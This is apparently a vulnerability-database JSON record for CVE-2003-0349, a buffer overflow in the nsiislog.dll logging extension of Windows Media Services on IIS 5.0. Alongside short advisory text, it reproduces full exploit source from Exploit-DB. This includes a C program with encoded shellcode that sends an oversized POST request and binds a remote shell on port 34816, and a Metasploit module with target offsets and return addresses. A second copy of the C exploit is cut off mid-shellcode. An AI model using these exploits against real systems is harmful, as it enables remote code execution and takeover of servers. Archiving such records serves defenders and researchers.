{"type": "osvdb", "published": "2003-06-25T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:4535", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 10, "edition": 1, "reporter": "Brett Moore(brett.moore@security-assessment.com)", "title": "Microsoft Media Services ISAPI nsiislog.dll POST Overflow", "affectedSoftware": [{"operator": "eq", "version": "2000", "name": "Windows"}], "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-04-28T13:19:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0349"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/ISAPI/MS03_022_NSIISLOG_POST"]}, {"type": "canvas", "idList": ["MS03_022"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802897", "OPENVAS:1361412562310101016"]}, {"type": "cert", "idList": ["VU:113716"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83155", "PACKETSTORM:92137"]}, {"type": "exploitdb", "idList": ["EDB-ID:16355", "EDB-ID:22837", "EDB-ID:48"]}, {"type": "nessus", "idList": ["NSIISLOG_DLL.NASL"]}], "modified": "2017-04-28T13:19:59", "rev": 2}, "vulnersScore": 7.5}, "references": [], "id": "OSVDB:4535", "lastseen": "2017-04-28T13:19:59", "cvelist": ["CVE-2003-0349"], "modified": "2003-06-25T00:00:00", "description": "## Vulnerability Description\nWindows Media Services contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the ISAPI (Internet Services Application Programming Interface) extension handling of incoming client requests in the nsiislog.dll file of the Internet Information Services (IIS). With a specially crafted POST request, an attacker may create a denial of service or exexcute arbitrary code.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nWindows Media Services contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the ISAPI (Internet Services Application Programming Interface) extension handling of incoming client requests in the nsiislog.dll file of the Internet Information Services (IIS). With a specially crafted POST request, an attacker may create a denial of service or exexcute arbitrary code.\n## Manual Testing Notes\ntelnet [victim] 80\nGET /scripts/nsiislog.dll /HTTP/1.0\n\nIf the server replies with \"NetShow ISAPI Log Dll\", nsiislog.dll is installed and the system may be vulnerable.\n## References:\n[Related OSVDB ID: 2106](https://vulners.com/osvdb/OSVDB:2106)\n[Nessus Plugin ID:11664](https://vulners.com/search?query=pluginID:11664)\nMicrosoft Security Bulletin: MS03-022\nMicrosoft Knowledge Base Article: 822343\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html\nKeyword: Internet Information Services (IIS)\nISS X-Force ID: 12652\n[CVE-2003-0349](https://vulners.com/cve/CVE-2003-0349)\nCIAC Advisory: n-109\nCERT VU: 113716\nBugtraq ID: 8035\n"}

{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll.", "edition": 3, "cvss3": {}, "published": "2003-07-24T04:00:00", "title": "CVE-2003-0349", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2003-0349"], "modified": "2018-10-12T21:32:00", "cpe": ["cpe:/o:microsoft:windows_2000:*"], "id": "CVE-2003-0349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0349", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T17:19:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "description": "**Name**| ms03_022 \n---|--- \n**CVE**| CVE-2003-0349 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IIS 5.0 Windows Media Services ISAPI (nsisslog.dll) Overflow \n**Notes**| CVE Name: CVE-2003-0349 \nVENDOR: Microsoft \nMSADV: MS03-022 \nVersionsAffected: \nRepeatability: Repeatable \nReferences: http://www.microsoft.com/technet/security/bulletin/ms03-022.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0349 \nDate public: 02/25/03 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2003-07-24T04:00:00", "published": "2003-07-24T04:00:00", "id": "MS03_022", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms03_022", "type": "canvas", "title": "Immunity Canvas: MS03_022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T11:36:22", "description": "MS Windows Media Services Remote Exploit (MS03-022). CVE-2003-0349. Remote exploit for windows platform", "published": "2003-07-01T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Media Services - Remote Exploit MS03-022", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2003-07-01T00:00:00", "id": "EDB-ID:48", "href": "https://www.exploit-db.com/exploits/48/", "sourceData": "// Windows Media Services Remote Command Execution #2\r\n// v. 1.0 beta\r\n// (c) firew0rker //tN [The N0b0D1eS]\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\n#ifdef WIN32\r\n#include <winsock.h>\r\n#pragma comment(lib, \"wsock32\")\r\n#else \r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#define SOCKET int\r\n#define DWORD uint32_t\r\n#define ULONG unsigned long\r\n#define INVALID_SOCKET -1\r\n#define SOCKET_ERROR -1\r\n#define closesocket close\r\n#endif\r\n\r\nchar shellcode[]=\r\n//\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xCC\" //\u00a4\u00ab\u00ef \u00ae\u00e2\u00ab \u00a4\u00aa\u00a8\r\n\"\\xeb\\x02\\xeb\\x05\\xe8\\xf9\\xff\\xff\"\r\n\"\\xff\\x5b\\x81\\xeb\\x4d\\x43\\x22\\x11\"\r\n\"\\x8b\\xc3\\x05\\x66\\x43\\x22\\x11\\x66\"\r\n\"\\xb9\\x15\\x03\\x80\\x30\\xfb\\x40\\x67\"\r\n\"\\xe2\\xf9\\x33\\xa3\\xf9\\xfb\\x72\\x66\"\r\n\"\\x53\\x06\\x04\\x04\\x76\\x66\\x37\\x06\"\r\n\"\\x04\\x04\\xa8\\x40\\xf6\\xbd\\xd9\\xea\"\r\n\"\\xf8\\x66\\x53\\x06\\x04\\x04\\xa8\\x93\"\r\n\"\\xfb\\xfb\\x04\\x04\\x13\\x91\\xfa\\xfb\"\r\n\"\\xfb\\x43\\xcd\\xbd\\xd9\\xea\\xf8\\x7e\"\r\n\"\\x53\\x06\\x04\\x04\\xab\\x04\\x6e\\x37\"\r\n\"\\x06\\x04\\x04\\xf0\\x3b\\xf4\\x7f\\xbe\"\r\n\"\\xfa\\xfb\\xfb\\x76\\x66\\x3b\\x06\\x04\"\r\n\"\\x04\\xa8\\x40\\xba\\xbd\\xd9\\xea\\xf8\"\r\n\"\\x66\\x53\\x06\\x04\\x04\\xa8\\xab\\x13\"\r\n\"\\xcc\\xfa\\xfb\\xfb\\x76\\x7e\\x8f\\x05\"\r\n\"\\x04\\x04\\xab\\x93\\xfa\\xfa\\xfb\\xfb\"\r\n\"\\x04\\x6e\\x4b\\x06\\x04\\x04\\xc8\\x20\"\r\n\"\\xa8\\xa8\\xa8\\x91\\xfd\\x91\\xfa\\x91\"\r\n\"\\xf9\\x04\\x6e\\x3b\\x06\\x04\\x04\\x72\"\r\n\"\\x7e\\xa7\\x05\\x04\\x04\\x9d\\x3c\\x7e\"\r\n\"\\x9f\\x05\\x04\\x04\\xf9\\xfb\\x9d\\x3c\"\r\n\"\\x7e\\x9d\\x05\\x04\\x04\\x73\\xfb\\x3c\"\r\n\"\\x7e\\x93\\x05\\x04\\x04\\xfb\\xfb\\xfb\"\r\n\"\\xfb\\x76\\x66\\x9f\\x05\\x04\\x04\\x91\"\r\n\"\\xeb\\xa8\\x04\\x4e\\xa7\\x05\\x04\\x04\"\r\n\"\\x04\\x6e\\x47\\x06\\x04\\x04\\xf0\\x3b\"\r\n\"\\x8f\\xe8\\x76\\x6e\\x9c\\x05\\x04\\x04\"\r\n\"\\x05\\xf9\\x7b\\xc1\\xfb\\xf4\\x7f\\x46\"\r\n\"\\xfb\\xfb\\xfb\\x10\\x2f\\x91\\xfa\\x04\"\r\n\"\\x4e\\xa7\\x05\\x04\\x04\\x04\\x6e\\x43\"\r\n\"\\x06\\x04\\x04\\xf0\\x3b\\xf4\\x7e\\x5e\"\r\n\"\\xfb\\xfb\\xfb\\x3c\\x7e\\x9b\\x05\\x04\"\r\n\"\\x04\\xeb\\xfb\\xfb\\xfb\\x76\\x7e\\x9b\"\r\n\"\\x05\\x04\\x04\\xab\\x76\\x7e\\x9f\\x05\"\r\n\"\\x04\\x04\\xab\\x04\\x4e\\xa7\\x05\\x04\"\r\n\"\\x04\\x04\\x6e\\x4f\\x06\\x04\\x04\\x72\"\r\n\"\\x7e\\xa3\\x05\\x04\\x04\\x07\\x76\\x46\"\r\n\"\\xf3\\x05\\x04\\x04\\xc8\\x3b\\x42\\xbf\"\r\n\"\\xfb\\xfb\\xfb\\x08\\x51\\x3c\\x7e\\xcf\"\r\n\"\\x05\\x04\\x04\\xfb\\xfa\\xfb\\xfb\\x70\"\r\n\"\\x7e\\xa3\\x05\\x04\\x04\\x72\\x7e\\xbf\"\r\n\"\\x05\\x04\\x04\\x72\\x7e\\xb3\\x05\\x04\"\r\n\"\\x04\\x72\\x7e\\xbb\\x05\\x04\\x04\\x3c\"\r\n\"\\x7e\\xf3\\x05\\x04\\x04\\xbf\\xfb\\xfb\"\r\n\"\\xfb\\xc8\\x20\\x76\\x7e\\x03\\x06\\x04\"\r\n\"\\x04\\xab\\x76\\x7e\\xf3\\x05\\x04\\x04\"\r\n\"\\xab\\xa8\\xa8\\x93\\xfb\\xfb\\xfb\\xf3\"\r\n\"\\x91\\xfa\\xa8\\xa8\\x43\\x8c\\xbd\\xd9\"\r\n\"\\xea\\xf8\\x7e\\x53\\x06\\x04\\x04\\xab\"\r\n\"\\xa8\\x04\\x6e\\x3f\\x06\\x04\\x04\\x04\"\r\n\"\\x4e\\xa3\\x05\\x04\\x04\\x04\\x6e\\x57\"\r\n\"\\x06\\x04\\x04\\x12\\xa0\\x04\\x04\\x04\"\r\n\"\\x04\\x6e\\x33\\x06\\x04\\x04\\x13\\x76\"\r\n\"\\xfa\\xfb\\xfb\\x33\\xef\\xfb\\xfb\\xac\"\r\n\"\\xad\\x13\\xfb\\xfb\\xfb\\xfb\\x7a\\xd7\"\r\n\"\\xdf\\xf9\\xbe\\xd9\\xea\\x43\\x0e\\xbe\"\r\n\"\\xd9\\xea\\xf8\\xff\\xdf\\x78\\x3f\\xff\"\r\n\"\\xab\\x9f\\x9c\\x04\\xcd\\xfb\\xfb\\x72\"\r\n\"\\x9e\\x03\\x13\\xfb\\xfb\\xfb\\xfb\\x7a\"\r\n\"\\xd7\\xdf\\xd8\\xbe\\xd9\\xea\\x43\\xac\"\r\n\"\\xbe\\xd9\\xea\\xf8\\xff\\xdf\\x78\\x3f\"\r\n\"\\xff\\x72\\xbe\\x07\\x9f\\x9c\\x72\\xdd\"\r\n\"\\xfb\\xfb\\x70\\x86\\xf3\\x9d\\x7a\\xc4\"\r\n\"\\xb6\\xa1\\x8e\\xf4\\x70\\x0c\\xf8\\x8d\"\r\n\"\\xc7\\x7a\\xc5\\xab\\xbe\\xfb\\xfb\\x8e\"\r\n\"\\xf9\\x10\\xf3\\x7a\\x14\\xfb\\xfb\\xfa\"\r\n\"\\xfb\\x10\\x19\\x72\\x86\\x0b\\x72\\x8e\"\r\n\"\\x17\\x70\\x86\\xf7\\x42\\x6d\\xfb\\xfb\"\r\n\"\\xfb\\xc9\\x3b\\x09\\x55\\x72\\x86\\x0f\"\r\n\"\\x70\\x34\\xd0\\xb6\\xf7\\x70\\xad\\x83\"\r\n\"\\xf8\\xae\\x0b\\x70\\xa1\\xdb\\xf8\\xa6\"\r\n\"\\x0b\\xc8\\x3b\\x70\\xc0\\xf8\\x86\\x0b\"\r\n\"\\x70\\x8e\\xf7\\xaa\\x08\\x5d\\x8e\\xfe\"\r\n\"\\x78\\x3f\\xff\\x10\\xf1\\xa2\\x78\\x38\"\r\n\"\\xff\\xbb\\xc0\\xb9\\xe3\\x8e\\x1f\\xc0\"\r\n\"\\xb9\\xe3\\x8e\\xf9\\x10\\xb8\\x70\\x89\"\r\n\"\\xdf\\xf8\\x8e\\x0b\\x2a\\x1b\\xf8\\x3d\"\r\n\"\\xf4\\x4c\\xfb\\x70\\x81\\xe7\\x3a\\x1b\"\r\n\"\\xf9\\xf8\\xbe\\x0b\\xf8\\x3c\\x70\\xfb\"\r\n\"\\xf8\\xbe\\x0b\\x70\\xb6\\x0f\\x72\\xb6\"\r\n\"\\xf7\\x70\\xa6\\xeb\\x72\\xf8\\x78\\x96\"\r\n\"\\xeb\\xff\\x70\\x8e\\x17\\x7b\\xc2\\xfb\"\r\n\"\\x8e\\x7c\\x9f\\x9c\\x74\\xfd\\xfb\\xfb\"\r\n\"\\x78\\x3f\\xff\\xa5\\xa4\\x32\\x39\\xf7\"\r\n\"\\xfb\\x70\\x86\\x0b\\x12\\x99\\x04\\x04\"\r\n\"\\x04\\x33\\xfb\\xfb\\xfb\\x70\\xbe\\xeb\"\r\n\"\\x7a\\x53\\x67\\xfb\\xfb\\xfb\\xfb\\xfb\"\r\n\"\\xfa\\xfb\\x43\\xfb\\xfb\\xfb\\xfb\\x32\"\r\n\"\\x38\\xb7\\x94\\x9a\\x9f\\xb7\\x92\\x99\"\r\n\"\\x89\\x9a\\x89\\x82\\xba\\xfb\\xbe\\x83\"\r\n\"\\x92\\x8f\\xab\\x89\\x94\\x98\\x9e\\x88\"\r\n\"\\x88\\xfb\\xb8\\x89\\x9e\\x9a\\x8f\\x9e\"\r\n\"\\xab\\x89\\x94\\x98\\x9e\\x88\\x88\\xba\"\r\n\"\\xfb\\xfb\\xac\\xa8\\xc9\\xa4\\xc8\\xc9\"\r\n\"\\xd5\\xbf\\xb7\\xb7\\xfb\\xac\\xa8\\xba\"\r\n\"\\xa8\\x94\\x98\\x90\\x9e\\x8f\\xba\\xfb\"\r\n\"\\x99\\x92\\x95\\x9f\\xfb\\x97\\x92\\x88\"\r\n\"\\x8f\\x9e\\x95\\xfb\\x9a\\x98\\x98\\x9e\"\r\n\"\\x8b\\x8f\\xfb\\xac\\xa8\\xba\\xa8\\x8f\"\r\n\"\\x9a\\x89\\x8f\\x8e\\x8b\\xfb\\x98\\x97\"\r\n\"\\x94\\x88\\x9e\\x88\\x94\\x98\\x90\\x9e\"\r\n\"\\x8f\\xfb\\xfb\\x98\\x96\\x9f\\xfb\\xe9\"\r\n\"\\xc4\\xfc\\xff\\xff\\x74\\xf9\\x75\\xf7\";\r\n\r\n\r\nconst DWORD default_EIP_pos = 9992; //\u00af\u00ae\u00ab\u00ae\u00a6\u00a5\u00ad\u00a8\u00a5 EIP \u00a2 \u00a1\u00e3\u00e4\u00a5\u00e0\u00a5 (sploit)\r\nconst DWORD default_EBX_points_to = 9988; //\u00e3\u00aa \u00a7 \u00e2\u00a5\u00ab\u00ec \u00a2 EBX \u00ae\u00e2\u00ad\u00ae\u00e1\u00a8\u00e2\u00a5\u00ab\u00ec\u00ad\u00ae sploit\r\n//const DWORD default_EIP_value = 0x77F8441B; //\u00af\u00ae \u00ed\u00e2\u00ae\u00ac\u00e3 \u00a4\u00e0. \u00a4.\u00a1. JMP EDX, \u00a2 \u00a4 \u00ad\u00ad\u00ae\u00ac \u00e1\u00ab\u00e3\u00e7 \u00a5 \u00ed\u00e2\u00ae \u00a2 ntdll.dll\r\nconst DWORD default_EIP_value = 0x40F01333;\r\n//const default_EDX_points_to = 0x1000; //\u00ed\u00e2\u00ae \u00ad\u00a5 \u00af\u00e0\u00a8\u00a3\u00ae\u00a4\u00a8\u00ab\u00ae\u00e1\u00ec\r\nchar *nsiislog_default = \"/scripts/nsiislog.dll\";\r\nchar sploit[default_EIP_pos+4+sizeof(shellcode)+1];\r\nchar sploitbuf[sizeof(sploit)*2];\r\n\r\nvoid usage(char* argv[])\r\n{\r\n printf(\"Dicklamer (: \"\r\n\t\"We are not responsible for the illegal use of this software.\\n\"\r\n\t\"Description: Binds shell to port 34816 (or higher if port busy).\\n\"\r\n\t\"Usage:\t\"\r\n\t\"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\\n\"\r\n\t\"Supported target(s):\\n\"\r\n\t\"Windows version\\t\\t\\t\\tnsiislog.dll version\\n\"\r\n\t\"------------------------------------------------------------\\n\"\r\n\t\"2000 [5.00.2195] server rus.\\t\\t4.1.0.3917\\n\", argv[0]);\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n#ifdef WIN32\r\n\tWSADATA wsaData; \r\n#endif\r\n\tint target_port = 80;\r\n\tchar *nsiislog = nsiislog_default;\r\n\tint\t\tnArgIndex;\r\n\r\n\tif (argc<2) usage(argv);\r\n\tnArgIndex = 1;\r\n\twhile ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))\r\n\t{\r\n\t\tswitch (argv[nArgIndex++][1])\r\n\t\t{\r\n\t\tcase 'p':\r\n\t\tcase 'P':\r\n\t\t\ttarget_port = atoi(argv[nArgIndex++]);\r\n\t\t\tcontinue;\r\n\t\tcase 'r':\r\n\t\tcase 'R':\r\n\t\t\tnsiislog = argv[nArgIndex++];\r\n\t\t\tcontinue;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\t\r\n\ttry {\r\n#ifdef WIN32\r\n\t\tWSAStartup(0x0101, &wsaData);\r\n#endif\r\n\t\tSOCKET s = socket(AF_INET,SOCK_STREAM,0);\r\n\t\tif (s == INVALID_SOCKET) throw(\"No socket\");\r\n\t\tsockaddr_in addr;\r\n\t\t\r\n\t\t//\u017d\u00af\u00e0\u00a5\u00a4\u00a5\u00ab\u00ef\u00a5\u00ac \u00a4\u00e0\u00a5\u00e1 \u00e1\u00a5\u00e0\u00a2 \u00aa \r\n\t\tULONG iaddr = inet_addr(argv[1]);\r\n\t\tif (iaddr == INADDR_NONE) {//\u20ac\u00a4\u00e0\u00a5\u00e1 - \u00a8\u00ac\u00ef \u00e1\u00a5\u00e0\u00a2 \u00aa \r\n\t\t\thostent *ph = gethostbyname(argv[1]);\r\n\t\t\tif (!ph) throw(\"Cant resolve hostname\");\r\n\t\t\tmemcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));\r\n\t\t} else {//\u20ac\u00a4\u00e0\u00a5\u00e1 - IP\r\n\t\t\tmemcpy(&addr.sin_addr.s_addr,&iaddr,4);\r\n\t\t};\r\n\t\t\r\n\t\taddr.sin_family = AF_INET;\r\n\t\taddr.sin_port = htons(target_port);\r\n\t\tint sizeofaddr=sizeof(addr);\r\n\r\nchar *req = \"MX_STATS_LogLine: \";\r\nstrcpy(sploit, req);\r\nmemset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));\r\n//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*\u00e3\u00a1\u00e0 \u00e2\u00ec \\0*/);\r\nmemcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*\u00e3\u00a1\u00e0 \u00e2\u00ec \\0*/);\r\n//\u00af\u00e0\u00a8 \u00af\u00a5\u00e0\u00a5\u00e5\u00ae\u00a4\u00a5 \u00ad EIP, EBX \u00a1\u00e3\u00a4\u00a5\u00e2 \u00e3\u00aa \u00a7\u00eb\u00a2 \u00e2\u00ec \u00ad \u00af\u00ae\u00e1\u00ab\u00a5\u00a4\u00ad\u00a8\u00a9 DWORD \u00ad \u00e8\u00a5\u00a3\u00ae \u00a7 \u00af\u00e0\u00ae\u00e1 , \u00a3\u00a4\u00a5 JZ/JNZ\r\nmemcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);\r\n\t\t\r\n\t\t/*strcpy(sploit+sizeof(sploit)-11,\"BCDEFGHIJK\");*/\r\n\t\tsploit[sizeof(sploit)-1] = 0;\r\n\t\t\r\n if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw(\"Cant connect host\");\r\n\r\n\t\tsprintf(sploitbuf,\r\n\t\t\t\"POST %s HTTP/1.0\\r\\n\"\r\n\t\t\t\"Accept: */*\\r\\n\"\r\n\t\t\t\"User-Agent: NSPlayer/4.1.0.3917\\r\\n\"\r\n\t\t\t\"Content-Type: text/plain\\r\\n\"\r\n\t\t\t\"Content-Length: %i\\r\\n\"\r\n\t\t\t\"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\\r\\n\"\r\n\t\t\t\"\\r\\n%s\\r\\n\",\r\n\t\t\tnsiislog,strlen(sploit),sploit);\r\n\t\t\r\n\t\tint snd=send(s,sploitbuf,strlen(sploitbuf),0);\r\n\t\tif (snd == strlen(sploitbuf)) printf(\"Target exploited.\\n\");\r\n\t\t\telse throw(\"Cant send exploit\");\r\n\t\tclosesocket(s);\r\n\t}\r\n\tcatch (char *errmsg) \r\n\t{\r\n\t\t\r\n\t\tprintf(\"%s\\n\",errmsg);\r\n\t\treturn -1;\r\n\t}\r\n\tcatch (int err_n) \r\n\t{\r\n\t\tprintf(\"error %i\\n\",err_n);\r\n\t\treturn err_n;\r\n\t}\r\n#ifdef WIN32\r\n WSACleanup();\r\n#endif\r\n\treturn 0;\r\n}\r\n\r\n\r\n// milw0rm.com [2003-07-01]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/48/"}, {"lastseen": "2016-02-01T23:41:00", "description": "Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow. CVE-2003-0349. Remote exploit for windows platform", "published": "2010-07-25T00:00:00", "type": "exploitdb", "title": "Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2010-07-25T00:00:00", "id": "EDB-ID:16355", "href": "https://www.exploit-db.com/exploits/16355/", "sourceData": "##\r\n# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis exploits a buffer overflow found in the nsiislog.dll\r\n\t\t\t\tISAPI filter that comes with Windows Media Server. This\r\n\t\t\t\tmodule will also work against the 'patched' MS03-019\r\n\t\t\t\tversion. This vulnerability was addressed by MS03-022.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9929 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2003-0349'],\r\n\t\t\t\t\t[ 'OSVDB', '4535'],\r\n\t\t\t\t\t[ 'BID', '8035'],\r\n\t\t\t\t\t[ 'MSB', 'MS03-022'],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2b\\x26\\x3d\\x25\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# SEH offsets by version (Windows 2000)\r\n\t\t\t\t\t# 4.1.0.3917 = 9992\r\n\t\t\t\t\t# 4.1.0.3920 = 9992\r\n\t\t\t\t\t# 4.1.0.3927 = 9992\r\n\t\t\t\t\t# 4.1.0.3931 = 14092\r\n\r\n\t\t\t\t\t['Brute Force', { }],\r\n\t\t\t\t\t['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }],\r\n\t\t\t\t\t['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],\r\n\t\t\t\t\t['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 25 2003',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URL', [ true, \"The path to nsiislog.dll\", \"/scripts/nsiislog.dll\" ]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => datastore['URL']\r\n\t\t}, -1)\r\n\r\n\t\tif (res and res.body =~ /NetShow ISAPI/)\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\t# Create a buffer greater than max SEH offset (16384)\r\n\t\tpst = rand_text_alphanumeric(256) * 64\r\n\r\n\t\t# Create SEH frame and insert into buffer\r\n\t\tseh = generate_seh_payload(target['Rets'][1])\r\n\t\tpst[target['Rets'][0], seh.length] = seh\r\n\r\n\t\t# Send it to the server\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URL'],\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'user-agent' => 'NSPlayer/2.0',\r\n\t\t\t'content-type' => 'application/x-www-form-urlencoded',\r\n\t\t\t'data' => pst\r\n\t\t}, 5)\r\n\r\n\t\tselect(nil,nil,nil,1)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16355/"}, {"lastseen": "2016-02-02T19:39:29", "description": "Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow. CVE-2003-0349. Remote exploit for windows platform", "published": "2003-06-25T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2003-06-25T00:00:00", "id": "EDB-ID:22837", "href": "https://www.exploit-db.com/exploits/22837/", "sourceData": "source: http://www.securityfocus.com/bid/8035/info\r\n\r\nMicrosoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.\r\n\r\n// Windows Media Services Remote Command Execution #2 \r\n// v. 1.0 beta \r\n// (c) firew0rker //tN [The N0b0D1eS] \r\n\r\n#include <stdio.h> \r\n#include <string.h> \r\n#include <stdlib.h> \r\n\r\n#ifdef WIN32 \r\n#include <winsock.h> \r\n#pragma comment(lib, \"wsock32\") \r\n#else \r\n#include <sys/socket.h> \r\n#include <sys/types.h> \r\n#include <netinet/in.h> \r\n#include <arpa/inet.h> \r\n#include <netdb.h> \r\n#include <unistd.h> \r\n#define SOCKET int \r\n#define DWORD uint32_t \r\n#define ULONG unsigned long \r\n#define INVALID_SOCKET -1 \r\n#define SOCKET_ERROR -1 \r\n#define closesocket close \r\n#endif \r\n\r\nchar shellcode[]= \r\n//\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xCC\" //\u00a4\u00ab\u00ef\u00e2\u00a4\u00aa\u00a8 \r\n\"\\xeb\\x02\\xeb\\x05\\xe8\\xf9\\xff\\xff\" \r\n\"\\xff\\x5b\\x81\\xeb\\x4d\\x43\\x22\\x11\" \r\n\"\\x8b\\xc3\\x05\\x66\\x43\\x22\\x11\\x66\" 